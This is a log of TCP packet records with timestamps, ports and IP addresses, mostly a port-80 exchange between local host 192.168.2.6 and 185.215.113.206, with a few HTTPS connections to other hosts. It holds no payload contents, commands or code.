Dec 8, 2024 13:31:49.084351063 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.084439039 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.086638927 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.086687088 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.086821079 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.086869001 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.088962078 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.089005947 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.089071035 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.089118004 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.091476917 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.091526031 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.091531038 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.091567993 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.093698978 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.093743086 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.093816042 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.093858957 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.096060038 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.096110106 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.096173048 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.096213102 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.098418951 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.098472118 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.098546028 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.098613024 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.100819111 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.100866079 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.100903988 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.100959063 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.103151083 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.103204012 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.103230953 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.103270054 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.105604887 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.105654001 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.105751038 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.105797052 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.107328892 CET	443	49841	23.206.197.42	192.168.2.6
Dec 8, 2024 13:31:49.107844114 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.107896090 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.107959032 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.108047009 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.110184908 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.110243082 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.110304117 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.110366106 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.112560034 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.112646103 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.112675905 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.112716913 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.114931107 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.114979029 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.114981890 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.115024090 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.117261887 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.117326975 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.117392063 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.117429018 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.119632959 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.119688988 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.119714975 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.119755983 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.121989012 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.122057915 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.122167110 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.122216940 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.124345064 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.124389887 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.124466896 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.124505043 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.125998020 CET	443	49839	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:49.126065969 CET	443	49839	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:49.126112938 CET	49839	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:49.126317024 CET	49839	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:49.126334906 CET	443	49839	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:49.126348972 CET	49839	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:49.126354933 CET	443	49839	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:49.126715899 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.126764059 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.126810074 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.126847982 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.128972054 CET	49845	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:49.129005909 CET	443	49845	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:49.129151106 CET	49845	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:49.129190922 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.129216909 CET	49845	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:49.129225016 CET	443	49845	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:49.129235983 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.129272938 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.129406929 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.131431103 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.131475925 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.131508112 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.131545067 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.133788109 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.133847952 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.133879900 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.133991003 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.136305094 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.136461020 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.136472940 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.136498928 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.138501883 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.138566017 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.138590097 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.138628006 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.140818119 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.140872955 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.150341988 CET	443	49840	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:49.150759935 CET	49840	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:49.150794029 CET	443	49840	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:49.151195049 CET	49840	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:49.151200056 CET	443	49840	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:49.202649117 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.202722073 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.202805996 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.202857971 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.203432083 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.203491926 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.203556061 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.203644991 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.205212116 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.205265045 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.205301046 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.205343962 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.207010031 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.207073927 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.207125902 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.207171917 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.208817005 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.208873034 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.208919048 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.208961010 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.210648060 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.210695982 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.210789919 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.211003065 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.212390900 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.212483883 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.212502956 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.212548971 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.214210987 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.214267969 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.214307070 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.214350939 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.215893984 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.215964079 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.216016054 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.216058969 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.217580080 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.217633963 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.217734098 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.217781067 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.219325066 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.219372034 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.219430923 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.219470978 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.220951080 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.221002102 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.221168995 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.221304893 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.222632885 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.222686052 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.222742081 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.222853899 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.224340916 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.224390030 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.224438906 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.224483013 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.225902081 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.226006031 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.226052999 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.226097107 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.227530003 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.227606058 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.227679968 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.227739096 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.229150057 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.229208946 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.229295969 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.229347944 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.230741978 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.230791092 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.230963945 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.231013060 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.232299089 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.232426882 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.232433081 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.232470036 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.233843088 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.233906984 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.234071016 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.234133005 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.235642910 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.235793114 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.235857964 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.237215042 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.237272978 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.237287998 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.237330914 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.238713980 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.238801003 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.238898039 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.238943100 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.240564108 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.240721941 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.240771055 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.242373943 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.242428064 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.242450953 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.242497921 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.243596077 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.243644953 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.243689060 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.243735075 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.244959116 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.245017052 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.245021105 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.245065928 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.246264935 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.246342897 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.246371031 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.246412039 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.247380972 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.247454882 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.247502089 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.247545004 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.248842955 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.248894930 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.248964071 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.249007940 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.250298023 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.250365973 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.250416040 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.251755953 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.251816034 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.251877069 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.251934052 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.253190994 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.253226995 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.253252029 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.253274918 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.254694939 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.254755974 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.254909992 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.254956961 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.256011009 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.256083012 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.256169081 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.256230116 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.257411957 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.257468939 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.257530928 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.257589102 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.258868933 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.258925915 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.258969069 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.259159088 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.259712934 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.259783030 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.259815931 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.259902954 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.260538101 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.260664940 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.260691881 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.260741949 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.261392117 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.261440992 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.261486053 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.261531115 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.262255907 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.262303114 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.262448072 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.262589931 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.263118982 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.263164997 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.263206005 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.263293982 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.263957977 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.264010906 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.264103889 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.264192104 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.264805079 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.264924049 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.264941931 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.264972925 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.265660048 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.265718937 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.265760899 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.265825033 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.266522884 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.266573906 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.266623020 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.266664028 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.267358065 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.267417908 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.267469883 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.267530918 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.268243074 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.268296003 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.268343925 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.268389940 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.269149065 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.269181967 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.269203901 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.269228935 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.270035028 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.270087004 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.270128012 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.270169020 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.270766973 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.270823956 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.270875931 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.270929098 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.271600008 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.271651983 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.271716118 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.271761894 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.272475958 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.272531033 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.272572041 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.272618055 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.273262978 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.273334980 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.396028996 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.396126032 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.396172047 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.396296978 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.396379948 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.396423101 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.396482944 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.397262096 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.397308111 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.397360086 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.397401094 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.398129940 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.398190022 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.398220062 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.398263931 CET	49835	80	192.168.2.6	185.215.113.206
